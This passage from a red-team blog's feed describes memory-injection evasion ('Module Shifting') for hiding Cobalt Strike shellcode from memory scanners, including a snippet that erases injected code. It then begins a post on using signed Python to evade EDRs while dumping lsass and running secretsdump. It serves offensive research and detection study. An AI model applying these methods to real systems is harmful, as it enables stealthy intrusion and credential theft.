  <li>We can avoid the usage of compiled PE for injection.</li>
  <li>We can avoid AMSI inspection (there’s no AMSI for Python) and AV/EDR inspection of dynamic Python code (there’s no introspection for dynamic Python code).</li>
</ol>

<h4 id="moving-parts---payload">Moving Parts - Payload</h4>

<p>The final stage of an injection technique is to achieve payload execution; the payload is essentially code to be run on a target machine.
In the context of Memory Injection, payloads can come in the form of:</p>
<ol>
  <li>PE (executables or dlls)</li>
  <li>Position Independent Code (Shellcode, BOFs, etc.)</li>
</ol>

<p>PE payloads are usually less flexible than shellcode because of their size (PE header and sections’ overhead). They’re also rarely used to stage further malware; instead, they’re often intended as “final” payloads containing the core of the malware.
Furthermore, the size constraint makes a PE an unviable candidate for injection techniques where little space is available.</p>

<p>On the other hand, shellcode has more flexibility and evasion properties:</p>
<ul>
  <li>Shellcode can be used to load further-stage payloads (even a PE) and can be made independent from final payloads, meaning that once the shellcode has loaded and started the final payload, it can be erased without impairing the functionality of the final payload itself.</li>
  <li>Shellcode can be shrunk (using stagers for example) to fit small space constraints.</li>
  <li>Position Independent Code payloads can be obfuscated <a href="https://github.com/codewhitesec/Lastenzug">at the assembly level</a></li>
</ul>

<p>For these reasons we’ll choose shellcode as payload, and to make it independent from further stages we’ll use a stageless Cobalt Strike Beacon shellcode generated with AceLdr.</p>

<p>AceLdr shellcode will load a copy of Beacon on the Heap and it’ll apply advanced in-memory evasion techniques. 
The scope of this blogpost is improving the injection technique rather than the payloads, so we’ll be focusing on the artifacts that the injection technique is leaving behind.</p>

<h4 id="testing-with-memory-scanners">Testing with memory scanners</h4>

<p>In the realm of cybersecurity, understanding and mitigating novel threats is paramount. For this purpose, great professionals like Forrest Orr and Aleksandra Doniec published, respectively,
<a href="https://github.com/forrest-orr/moneta">Moneta</a> and <a href="https://github.com/hasherezade/pe-sieve">PE-Sieve</a>, which are state-of-the-art publicly available memory scanners designed to detect sophisticated memory-based attacks.</p>

<p>Moneta excels in identifying the presence of dynamic/unknown code and suspicious characteristics of the mapped PE image regions, which are often telltale signs of an attack.
On the other hand, PE-Sieve is designed to identify suspicious memory regions based on malware IOCs and uses a variety of data analysis tricks to refine its detection criteria.
These tools were originally designed for defenders, but could be also used by attackers to improve their craft.</p>

<p>When we delve into the intricacies of memory injection techniques like Module stomping and Module overloading, both these tools become instrumental. 
By utilizing these scanners, we can identify the improvement opportunities in these injection techniques, making it possible to enhance their efficiency when deploying shellcode and ensuring they remain undetected by modern defense mechanisms.</p>

<p>Having these tools at hand is also beneficial in finding some weird common behaviours that we can use to our advantage to better blend in.
For example, running Moneta on all processes on a Windows 10 operating system and inspecting its results can lead to interesting findings.</p>

<p>In fact, some .NET dlls are known to self-modify their .text section, leading to Moneta’s “Modified Code” IoC.
Third-party apps like Discord and Signal show the same behaviour. It’s interesting to note that the number of bytes they overwrite is bigger in the latter cases.</p>

<p>Generally, the more bytes a dll self-modifies, the better, since an attacker can smuggle a bigger payload and mimic the exact same behaviour of the legitimate applications.
In particular, security solutions would probably whitelist this behaviour, because otherwise they would be overwhelmed by false positives and customers would be unhappy.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/FP1.png" alt="image-center" title="False Positives - self-modifying behaviours done by legitimate applications" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>False Positives - self-modifying behaviours done by legitimate applications</em></td>
    </tr>
  </tbody>
</table>

<h4 id="starting-point---pythonmemorymodule">Starting Point - PythonMemoryModule</h4>

<p>After defining the strategy, we should start somewhere and iterate to improve. Our starting point is the MemoryModule technique, that is instrumental to the Module Overloading injection that we’ll target later on.</p>

<p>MemoryModule is a technique <a href="https://www.joachim-bauch.de/tutorials/loading-a-dll-from-memory/">first published</a> by Joachim Bauch and is used to map and load a dll in memory without calling the LoadLibrary Windows API.
This is achieved by executing the same operations done by the Windows Loader when the LoadLibrary API call is issued.
The following image depicts its basic steps:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/PythonMM.png" alt="image-center" title="MemoryModule technique" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>MemoryModule technique</em></td>
    </tr>
  </tbody>
</table>
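
<p>Whatever the implementation, a MemoryModule-style loader (and, for that matter, a memory scanner) first has to read the PE headers and the section table. As a minimal sketch, assuming a well-formed PE image held in a Python bytes object, the section table can be read as follows. The helper names (u16, u32, parse_sections) are ours for illustration and are not taken from PythonMemoryModule.</p>

```python
def u16(buf: bytes, off: int) -> int:
    """Read a little-endian 16-bit value."""
    return int.from_bytes(buf[off:off + 2], "little")


def u32(buf: bytes, off: int) -> int:
    """Read a little-endian 32-bit value."""
    return int.from_bytes(buf[off:off + 4], "little")


def parse_sections(image: bytes):
    """Return the section headers of a PE image as a list of dicts."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = u32(image, 0x3C)                 # e_lfanew: offset of the PE signature
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    count = u16(image, pe + 6)            # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = u16(image, pe + 20)        # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    table = pe + 24 + opt_size            # section table follows the optional header
    sections = []
    for i in range(count):
        off = table + i * 40              # each IMAGE_SECTION_HEADER is 40 bytes
        sections.append({
            "name": image[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": u32(image, off + 8),
            "virtual_address": u32(image, off + 12),
            "raw_size": u32(image, off + 16),
            "raw_offset": u32(image, off + 20),
            "characteristics": u32(image, off + 36),
        })
    return sections
```

<p>The returned virtual addresses, raw offsets and characteristics are the values that the later mapping steps, and the on-disk versus in-memory comparisons discussed below, rely on.</p>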

<p>In order to use the MemoryModule technique with a Python interpreted loader, the technique has been ported to Python ctypes and is available <a href="https://github.com/naksyn/PythonMemoryModule">on my PythonMemoryModule GitHub project</a>.</p>

<p>Combining the PythonMemoryModule project with <a href="https://github.com/naksyn/Pyramid">Pyramid</a> we can achieve the injection of a Cobalt Strike dll with MemoryModule technique using a full in-memory Python loader.
In the following video we’ll demonstrate the injection and the scanning results of Moneta and PE-Sieve on the injected process.</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/PythonMM.mp4" type="video/mp4" />
</video>

<p>In summary, PythonMemoryModule used with a Cobalt Strike dll is producing the following IoCs:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/IoCMM.png" alt="image-center" title="IoCs generated by MemoryModule and Cobalt Strike dll Artifact" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>IoCs generated by MemoryModule and Cobalt Strike dll Artifact</em></td>
    </tr>
  </tbody>
</table>

<p>The Abnormal Private executable Memory IoC detected at 0x6bac1000 is due to the MemoryModule injection technique that copied the .text section at that address and changed its permissions to RX subsequently.</p>

<p>The other Abnormal Private Executable Memory IoC is generated because the Cobalt Strike dll self-bootstraps Beacon in another area of memory (0x1c575a90000), so here we basically have two PEs in memory that generate IoCs, but only one is running Beacon.
Dynamic memory allocation would necessarily lead to the “Abnormal Private Executable Memory” IoC at some point, so we want to get rid of this IoC in the first place.</p>

<p>Module Overloading and Module Stomping techniques can provide us a way to avoid dynamic memory allocation.</p>

<h4 id="module-overloading">Module Overloading</h4>

<p>The Module Overloading technique, first <a href="https://github.com/hasherezade/module_overloading">published by Aleksandra Doniec</a>, aims at avoiding dynamic memory allocation by first loading a hosting dll using the LoadLibrary API, then overwriting it with malicious content (a PE), and finally loading that content using the same MemoryModule steps we saw earlier.</p>

<p>In this way the legitimate hosting dll is loaded via LoadLibrary API, but malicious content is loaded using the Memory Module technique over the memory space of the hosting dll that is legitimately loaded. This clever mix makes the Module Overloading Technique.</p>

<p>At a high level, Module Overloading steps (as implemented by Aleksandra Doniec) look like this:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/moduleoverloading.png" alt="image-center" title="Module Overloading injection technique" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Module Overloading injection technique</em></td>
    </tr>
  </tbody>
</table>

<p>Even though this technique is stealthier than Memory Module, we still have some IoCs to work on. Specifically, Moneta will identify “Modified Code” and “Modified Header” as IoCs after executing the injection.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/moduleoverloadingIoCs.png" alt="image-center" title="Module Overloading IoCs" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Module Overloading IoCs</em></td>
    </tr>
  </tbody>
</table>

<p>This result stems from the fact that we overwrote the hosting dll memory space with malicious content: when Moneta and PE-Sieve compare the on-disk bytes of the hosting dll with their in-memory counterpart, the two will mismatch, firing the “Modified Code” and “Replaced” IoCs if the overwrite happens to touch the hosting dll’s mapped .text section.</p>

<p>The “Modified Header” IoC is generated because this technique implementation starts overwriting from the very top of the hosting dll memory space, thus overwriting the PE header that commonly happens to reside in the first 0x1000 bytes.</p>
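
<p>The comparison logic described above can be illustrated with a deliberately simplified sketch. It works on two plain byte buffers (the on-disk image and its in-memory copy) and is not how Moneta or PE-Sieve are actually implemented: real scanners have to handle details such as relocations that are ignored here. The function names and the 0x1000 header size are assumptions made for illustration.</p>

```python
HEADER_SIZE = 0x1000  # assumption: the PE header sits in the first page


def modified_ranges(disk: bytes, memory: bytes):
    """Return (start, end) offsets, end exclusive, where the two buffers differ."""
    ranges = []
    start = None
    for offset, (a, b) in enumerate(zip(disk, memory)):
        if a != b and start is None:
            start = offset                      # a run of modified bytes begins
        elif a == b and start is not None:
            ranges.append((start, offset))      # the run ends
            start = None
    if start is not None:
        ranges.append((start, min(len(disk), len(memory))))
    return ranges


def classify(ranges, text_start: int, text_end: int):
    """Map modified ranges to the IoC names used in this post."""
    findings = set()
    for start, end in ranges:
        if HEADER_SIZE > start:
            findings.add("Modified Header")
        if end > text_start and text_end > start:   # overlaps the .text section
            findings.add("Modified Code")
    return findings
```

<p>Overwriting from offset 0, as the Module Overloading implementation does, produces both findings, while a buffer identical to the on-disk bytes produces none.</p>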

<p>All things considered, we got rid of the MemoryModule’s “Abnormal Private Executable memory” IoC but we introduced other IoCs related to the hosting dll byte-by-byte comparison between on-disk and memory space.</p>

<p>However, we can improve this outcome a bit by introducing the Module Stomping injection technique.</p>

<h4 id="module-stomping">Module Stomping</h4>

<p>Module Stomping provides the same benefit as Module Overloading: it avoids dynamic memory allocation by loading a hosting dll to be used as “disposable space” onto which malicious content is written.
The main difference is that Module Stomping is much simpler than Module Overloading because its aim is writing and executing shellcode, not a PE. So we don’t need the Windows Loader steps that both MemoryModule and Module Overloading adopted; with Module Stomping we just need to write the shellcode and execute it directly.</p>

<p>Some Module Stomping implementations have been made publicly available by <a href="https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/">F-Secure</a> and <a href="https://github.com/boku7/Ninja_UUID_Runner/">Bobby Cooke</a>.</p>

<p>At a high level, Module Stomping steps look like this:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/modulestomping.png" alt="image-center" title="Module Stomping injection technique" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Module Stomping injection technique</em></td>
    </tr>
  </tbody>
</table>

<p>After injecting via Module Stomping using wmp.dll as hosting dll and writing the malicious shellcode over the .rsrc section we obtain the IoCs depicted in the following image.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/modulestompingIoCs.png" alt="image-center" title="Module Stomping IoCs" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Module Stomping IoCs</em></td>
    </tr>
  </tbody>
</table>

<p>We gradually reduced the generated IoCs, but “Modified Code” is still haunting us because it’s a trademark of both the Module Stomping and Module Overloading techniques.
The “inconsistent +x between disk and memory” IoC is caused by the shellcode written over the .rsrc section and the RX permission subsequently set on it.
Moneta is complaining about the fact that .rsrc section originally does not have executable permission.</p>
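
<p>As a rough sketch of this kind of check (our own simplification, not Moneta’s code), a scanner can compare the section characteristics stored in the on-disk PE with the protection of the corresponding memory pages. The constants are the documented Windows values; the function name is hypothetical.</p>

```python
IMAGE_SCN_MEM_EXECUTE = 0x20000000

# PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY
EXECUTABLE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}


def inconsistent_exec(section_characteristics: int, page_protection: int) -> bool:
    """True when memory is executable but the on-disk section is not."""
    on_disk_exec = bool(section_characteristics & IMAGE_SCN_MEM_EXECUTE)
    # The low byte holds the base protection; modifiers such as PAGE_GUARD sit above it.
    in_memory_exec = (page_protection & 0xFF) in EXECUTABLE_PROTECTIONS
    return in_memory_exec and not on_disk_exec
```

<p>With typical values, a .rsrc section (characteristics 0x40000040) whose pages are PAGE_EXECUTE_READ (0x20) is flagged, while a .text section (0x60000020) with the same protection is not.</p>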

<p>Both of these IoCs can be finally avoided with some improvements that are implemented in a technique dubbed “Module Shifting”.</p>

<h3 id="module-shifting">Module Shifting</h3>

<p>Until now we have observed how some injections behave in memory and gained a bit of knowledge of how and why memory scanners identify suspicious memory anomalies.</p>

<p>We can use this knowledge to our advantage by asking ourselves a few what-if questions:</p>

<ol>
  <li>what if the writing of the shellcode is shifted to a section of a dll that is normally self-modifying the exact section?</li>
  <li>what if we inject using a self-modifying dll as host with enough space to write our shellcode and we apply some padding to look exactly as the self-modifying behaviour?</li>
  <li>what if we use a shellcode payload that is functionally independent from further stages and we overwrite the executed shellcode with the dll’s original bytes?</li>
</ol>

<p>After experimenting and answering all these questions we came up with the <a href="https://github.com/naksyn/ModuleShifting">Module Shifting technique</a> that aims at improving Module Stomping and Module Overloading by providing the following advantages:</p>

<ol>
  <li>Avoids “Modified code” between virtual memory and on disk dll leaving near to zero suspicious memory artifacts, getting no indicators on Moneta and PE-Sieve</li>
  <li>Better blending into common False Positives by choosing the target section and using padding</li>
  <li>Can be used with PE and shellcode payloads</li>
  <li>Implemented in Python ctypes – full-in-memory execution available</li>
</ol>

<p>At a high level, Module Shifting steps look like this:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/moduleshifting.png" alt="image-center" title="Module Shifting Injection technique" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Module Shifting Injection technique</em></td>
    </tr>
  </tbody>
</table>

<p>The restore operation is quite simple and is done after executing the initial shellcode.</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1"># Restore operation: make the stomped region writable again...
</span><span class="n">VirtualProtect</span><span class="p">(</span>
    <span class="n">cast</span><span class="p">(</span><span class="n">tgtaddr</span><span class="p">,</span> <span class="n">c_void_p</span><span class="p">),</span>
    <span class="n">mod_bytes_size</span><span class="p">,</span>
    <span class="n">PAGE_READWRITE</span><span class="p">,</span>
    <span class="n">byref</span><span class="p">(</span><span class="n">oldProtect</span><span class="p">))</span>
<span class="c1"># ...then copy the saved original dll bytes back over the shellcode
</span><span class="n">memmove</span><span class="p">(</span><span class="n">cast</span><span class="p">(</span><span class="n">tgtaddr</span><span class="p">,</span> <span class="n">c_void_p</span><span class="p">),</span> <span class="bp">self</span><span class="p">.</span><span class="n">targetsection_backupbuffer</span><span class="p">,</span> <span class="n">mod_bytes_size</span><span class="p">)</span>
</code></pre></figure>

<p>After setting the shellcode memory area permissions to RW, the content of <strong>targetsection_backupbuffer</strong>, which holds a copy of the original dll bytes for the exact size and position of the shellcode, gets written over the shellcode.
This effectively restores the stomped bytes to the original ones, leaving no traces of the written shellcode anymore.
In this way, Moneta and PE-Sieve will do a byte-by-byte comparison as usual and will find no mismatch between the hosting dll on-disk bytes and in-memory ones.</p>

<p>There also won’t be any inconsistent executable permissions because we set the permissions back to the section’s original values.</p>

<p>The following is a demonstration of a self-process injection with the Module Shifting technique, using a Cobalt Strike Beacon shellcode generated with AceLdr.
<strong>After executing Moneta and PE-Sieve we get no IoCs detected</strong> because the Module Shifting injection technique leaves no artifacts behind (the payload is not our focus), which was our initial aim.</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/moduleshifting.mp4" type="video/mp4" />
</video>

<p>Even though Moneta and PE-Sieve did not generate IoCs, a runtime inspection scanner could identify some anomalies.
In fact, overwriting a 307.2 kB payload over the .text section of mscorlib.ni.dll can be a malicious indicator because the common behaviour for this dll is to overwrite 45 kB.</p>

<p>However, this anomaly could not be spotted by scanners without runtime inspection capabilities, because Module Shifting does not leave artifacts floating around after having restored the stomped bytes.</p>
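
<p>From the defender’s side, this detection opportunity can be sketched as a simple baseline check. The snippet assumes a runtime inspection tool that already knows how many bytes a given dll normally self-modifies and can observe the size of a write as it happens; the baseline table, the tolerance factor and the function name are hypothetical, and only the 45 kB and 307.2 kB figures come from the example above.</p>

```python
# Hypothetical baseline: bytes a module is normally observed to self-modify.
BASELINE_MODIFIED_BYTES = {"mscorlib.ni.dll": 45_000}


def is_anomalous(module: str, observed_bytes: int, tolerance: float = 1.5) -> bool:
    """Flag a code modification that is much larger than the module's baseline."""
    baseline = BASELINE_MODIFIED_BYTES.get(module.lower())
    if baseline is None:
        # Assumption: modules with no known self-modifying behaviour
        # should not modify their code at all.
        return observed_bytes > 0
    return observed_bytes > baseline * tolerance
```

<p>With these values, a 307,200-byte overwrite of mscorlib.ni.dll is flagged, while the usual 45,000-byte self-modification is not.</p>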

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/detopp.png" alt="image-center" title="Detection Opportunities" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Detection Opportunities</em></td>
    </tr>
  </tbody>
</table>

<h3 id="outro">Outro</h3>

<p>In this exploration we dove into the intricacies of injection techniques, homing in on Module Stomping and Module Overloading as part of the PE injection arsenal.</p>

<p>The objective was clear: to improve these techniques, aiming for more operational stealthiness.
While traditional approaches like Module Stomping are affected by the “Modified Code” IoC because the stomped code remains in the hosting dll, we’ve delineated a strategy to finally circumvent this obstacle.
The newly introduced Module Shifting technique encapsulates these enhancements, offering a way to operate with greater stealthiness.</p>

<p>The key takeaways for this blog post are:</p>

<ol>
  <li>Injection Techniques have several moving parts</li>
  <li>Python can be used as a loader with Pyramid and ctypes to dynamically call Windows APIs</li>
  <li>Memory IoCs can be greatly reduced with a proper injection strategy</li>
  <li>Memory scanners can be used by attackers to find False Positive candidates to blend in</li>
  <li>Functionally-independent Shellcode payloads once injected and executed can be overwritten with original dll content</li>
  <li>ModuleShifting improvements can be applied also to other injection techniques</li>
</ol>

<p>The future of injection techniques is always evolving, and the landscape will continually shift towards greater sophistication and precision.</p>]]></content><author><name>Naksyn</name></author><category term="EDR evasion" /><category term="evasion" /><category term="redteam" /><category term="python" /><category term="injection" /><category term="cobalt strike" /><category term="module stomping" /><category term="module overloading" /><category term="pyramid" /><summary type="html"><![CDATA[A journey in improving Module Stomping and Module Overloading injection technique, ending up evading Moneta and PE-Sieve]]></summary></entry><entry><title type="html">Living-Off-the-Blindspot - Operating into EDRs’ blindspot</title><link href="https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html" rel="alternate" type="text/html" title="Living-Off-the-Blindspot - Operating into EDRs’ blindspot" /><published>2022-09-01T00:00:00-04:00</published><updated>2022-01-09T16:10:20-05:00</updated><id>https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot</id><content type="html" xml:base="https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html"><![CDATA[<p><img src="/images/edr_vs_python.png" alt="image-center" title="How evasion really looks like" class="align-center" /></p>

<div id="entry-table-of-contents" class="toc-wrapper">
  <h2 id="toc-toggle" class="no_toc">
  Table of Contents <i class="toc-toggle-icon fas fa-chevron-down"></i>
</h2>
<ol id="markdown-toc">
  <li><a href="#tldr" id="markdown-toc-tldr">TL;DR</a></li>
  <li><a href="#intro" id="markdown-toc-intro">Intro</a></li>
  <li><a href="#edrs-defenses" id="markdown-toc-edrs-defenses">EDRs Defenses</a>    <ol>
      <li><a href="#kernel-callbacks-and-usermode-hooking" id="markdown-toc-kernel-callbacks-and-usermode-hooking">Kernel Callbacks and Usermode Hooking</a></li>
      <li><a href="#memory-scanning" id="markdown-toc-memory-scanning">Memory Scanning</a></li>
      <li><a href="#ml-based-detections" id="markdown-toc-ml-based-detections">ML based detections</a></li>
      <li><a href="#iocs-and-ioas" id="markdown-toc-iocs-and-ioas">IoCs and IoAs</a></li>
    </ol>
  </li>
  <li><a href="#bypass-strategy" id="markdown-toc-bypass-strategy">Bypass Strategy</a>    <ol>
      <li><a href="#main-categories-of-edr-evasion-operations" id="markdown-toc-main-categories-of-edr-evasion-operations">Main Categories of EDR Evasion operations</a></li>
      <li><a href="#operational-constraints" id="markdown-toc-operational-constraints">Operational constraints</a></li>
      <li><a href="#choosing-a-language" id="markdown-toc-choosing-a-language">Choosing a language</a></li>
    </ol>
  </li>
  <li><a href="#leveraging-python" id="markdown-toc-leveraging-python">Leveraging Python</a>    <ol>
      <li><a href="#execution-method" id="markdown-toc-execution-method">Execution Method</a></li>
      <li><a href="#dynamic-in-memory-import" id="markdown-toc-dynamic-in-memory-import">Dynamic in-memory import</a></li>
      <li><a href="#beacon-object-file-execution-via-shellcode" id="markdown-toc-beacon-object-file-execution-via-shellcode">Beacon Object File execution via shellcode</a></li>
      <li><a href="#in-process-c2-agent-injection" id="markdown-toc-in-process-c2-agent-injection">In-process C2 agent injection</a></li>
    </ol>
  </li>
  <li><a href="#conclusions" id="markdown-toc-conclusions">Conclusions</a></li>
  <li><a href="#how-to-defend-from-this" id="markdown-toc-how-to-defend-from-this">How to defend from this</a></li>
</ol>

</div>

<p>The topic has been presented at <a href="https://adversaryvillage.org/adversary-events/DEFCON-30/">DEFCON30 - Adversary village</a> (deck is available <a href="https://github.com/naksyn/talks/tree/main/DEFCON30">here</a>).</p>

<h3 id="tldr">TL;DR</h3>

<p>Python provides some key properties that effectively create a blindspot for EDR detection, namely:</p>

<ol>
  <li>Python’s wide usage implies that a varied baseline telemetry exists for the Python interpreter, which natively runs APIs depending on the Python code being run. This can make it harder for EDR vendors to spot anomalies coming from python.exe or pythonw.exe.</li>
  <li>Python lacks transparency (ref. <a href="https://peps.python.org/pep-0578/">PEP-578</a>) for dynamic code executed from stock python.exe and pythonw.exe binaries.</li>
  <li>The Python Software Foundation officially provides a “Windows embeddable package” that can be used to run Python with a minimal environment without installation. The package comes with signed binaries.</li>
</ol>

<p>An attacker could leverage the Python official <a href="https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip">Windows Embeddable zip package</a> dropping it on disk and using the signed binary python.exe (or pythonw.exe) to execute a wide range of post exploitation tasks.</p>

<p>Having this in mind, a tool named <a href="https://github.com/naksyn/Pyramid">Pyramid</a> has been developed to demonstrate that one can bring useful capabilities into python.exe and operate while successfully evading EDR detection.
Pyramid can execute the following techniques straight from python.exe or pythonw.exe:</p>
<ul>
  <li>dynamically importing and executing Python-BloodHound and secretsdump.</li>
  <li>executing BOF (dumping lsass with nanodump).</li>
  <li>creating SSH local port forward to tunnel a C2 Agent.</li>
</ul>

<p>The tool has been successfully tested against several EDRs, demonstrating that a blindspot is indeed present and it is possible to execute a range of capabilities from it.
This technique has been dubbed <strong>Living-off-The-Blindspot</strong>.</p>

<h3 id="intro">Intro</h3>
<p>EDRs are commonly encountered by red teamers during engagements and it is vital to know some concepts on how to operate under their scrutiny without being detected.</p>

<p>In an effort to find a way around several EDRs, the bypass problem has been analyzed looking in a more holistic way at the current defenses put in place by EDRs in order to find a novel strategy that could enable operating in blind spots, rather than bypassing a single defense mechanism.</p>

<h3 id="edrs-defenses">EDRs Defenses</h3>
<p>EDRs deploy several defenses in order to detect and respond to threats. The common requirement for all the defenses is visibility, since you can’t protect what you can’t see.
Visibility can be understood as the EDR’s capability to properly process information aimed at gaining context for a specific status/action/language/technique on a system or network.
Information can come from OS sources (such as AMSI or ETW) or via proprietary techniques.</p>

<p>The following paragraphs provide some key concepts for every major defense that must be taken into consideration while thinking about a bypass strategy.
This post is not meant to be an extensive explanation of each defensive measure, since there are much better resources already available online.
Bear in mind that defenses do not usually work in silos: information is shared among them to contribute to the detection of malicious activity.</p>

<h4 id="kernel-callbacks-and-usermode-hooking">Kernel Callbacks and Usermode Hooking</h4>

<p>Two common ways of increasing visibility for EDRs are Kernel Callbacks and Usermode Hooking.</p>

<p>Kernel Callbacks are commonly used to get information on processes and loaded images and to inject EDR’s dll into newly created processes (see example in the image below).
The <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine">PsSetCreateProcessNotifyRoutine</a> routine registers a Kernel Callback such that, when a specific action occurs (i.e. process creation), a pre- or post-action notification is sent to the driver, which will then execute its callback. In the example below, the Kernel driver instructs the EDR process to inject the EDR’s dll into the newly created process, setting the groundwork for usermode hooking.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/kernel_callback.png" alt="image-center" title="Example of kernel callback trigger" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Kernel Callback example</em></td>
    </tr>
  </tbody>
</table>

<p>The EDR’s dll is then used mainly to perform Usermode Hooking, patching ntdll.dll and inspecting specific Windows API calls made by processes in order to take some action if a call is deemed malicious.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/usermode_hooking.png" alt="image-center" title="Example of Usermode Hooking" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Usermode Hooking example</em></td>
    </tr>
  </tbody>
</table>

<p>Usermode hooking has at least two big limitations:</p>
<ol>
  <li>EDRs do not hook every Windows API call for performance reasons; instead, they hook the APIs that are most commonly abused by malware.</li>
  <li>Hooking is done in usermode, so every usermode program can theoretically undo the hooking.</li>
</ol>

<h4 id="memory-scanning">Memory Scanning</h4>

<p>Memory scanning techniques look for patterns in the code and data of processes. From an EDR point of view they are resource intensive, so one of the most common approaches is to run scans periodically or to trigger them based on events, detections or analyst actions.</p>

<p>From an attacker’s perspective, memory scans are dangerous because even a fileless payload has to be in cleartext in memory while it is executing its routines. Recently, the offensive security community came up with techniques (such as <a href="https://github.com/mgeeky/ShellcodeFluctuation">ShellcodeFluctuation</a> and <a href="https://www.cobaltstrike.com/blog/sleep-mask-update-in-cobalt-strike-4-5/">Sleep mask</a> for Cobalt Strike) to mitigate the risk of detection in memory. They basically obfuscate the code in memory while a payload is “sleeping”, i.e. not executing tasks and waiting to fetch commands from the C2 after a certain time.</p>

<p>However, the risk is still relevant while the payload is executing tasks and if a memory scan is triggered by malicious operations done by the payload, this may very well lead to a memory dump or a pattern matching between the cleartext version of the payload code and a set of known-bad signatures.</p>
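
<p>To make the sleeping versus executing distinction concrete, here is a toy sketch of a signature scan over a byte buffer. The signature, the payload bytes and the XOR key are all made up for illustration, and a repeating XOR stands in for whatever masking a real sleep-obfuscation technique applies.</p>

```python
from itertools import cycle

# Hypothetical known-bad byte signature used only for this illustration.
SIGNATURE = b"BEACON_CONFIG"


def scan(memory: bytes, signatures=(SIGNATURE,)) -> bool:
    """Naive memory scan: True if any signature appears in the buffer."""
    return any(sig in memory for sig in signatures)


def xor_mask(memory: bytes, key: bytes) -> bytes:
    """XOR the buffer with a repeating key; applying it twice restores it."""
    return bytes(b ^ k for b, k in zip(memory, cycle(key)))


payload = b"\x90\x90" + SIGNATURE + b"\xcc"
key = b"\x5a\xa5\x3c"

sleeping = xor_mask(payload, key)   # state while waiting for the next check-in
awake = xor_mask(sleeping, key)     # state while executing tasks

print("scan while sleeping:", scan(sleeping))
print("scan while awake:   ", scan(awake))
```

<p>The masked buffer no longer contains the signature, while the unmasked one does, which is why a scan triggered during task execution remains a risk.</p>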

<h4 id="ml-based-detections">ML based detections</h4>

<p>Machine Learning is an entire discipline and I don’t dare to cover it extensively since I am no expert at all and there are many other better resources elsewhere.
However, we can focus on some key-concepts that are employed in ML detections that can be very useful in defining a bypass strategy.
Starting with the very basics, we can say that Machine Learning can detect variant malware files that can evade signature-based detection.</p>

<p>Malware peculiar characteristics are translated into “features” and used for Machine Learning models training.
Features can be static (identifiable without executing samples) or dynamic (extracted at runtime).
Basically, to detect malware using Machine Learning, one can collect a large number of malware and goodware samples, extract the features, train the ML system to recognize malware, then test the approach with real samples.</p>

<p>The features play an important role during the process because they are related to sample properties.
Some common features used to determine if a file is good are whether the file is digitally signed or whether it has been seen on more than 100 network workstations.
On the other hand, features used to determine if a file is bad could be the presence of malformed or encrypted data and a suspicious series of API calls made by the binary (dynamic feature).</p>

<p>The key concept here is that <strong>features have a “weight” into the decision process of a ML model</strong> (assigning weights to features is one of the ML training purposes).
In layman’s terms, this means that features with a higher weight might bend the ML model decision toward malware or goodware more than other lower-weight features.
Security vendors do not publish weights nor the features used by their ML models, but as attackers we can think about at least one feature that can help evading detections: <strong>Digital Signature</strong>.
It is in fact true that malware developers and operators <a href="https://duo.com/decipher/attackers-are-signing-malware-with-valid-certificates">often try to sign</a> their malware to evade security solutions because this property is often used as a goodware feature by ML models and probably with a pretty good weight.</p>
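
<p>A toy model helps to see how a single heavily weighted feature can move the verdict. The sketch below is a plain logistic score over binary features; the feature names and weights are invented for illustration, since vendors do not publish theirs.</p>

```python
import math

# Made-up weights for illustration; vendors do not publish theirs.
# Positive weights push toward "malware", negative ones toward "goodware".
WEIGHTS = {
    "has_encrypted_sections": 1.5,
    "suspicious_api_sequence": 2.0,
    "digitally_signed": -2.5,
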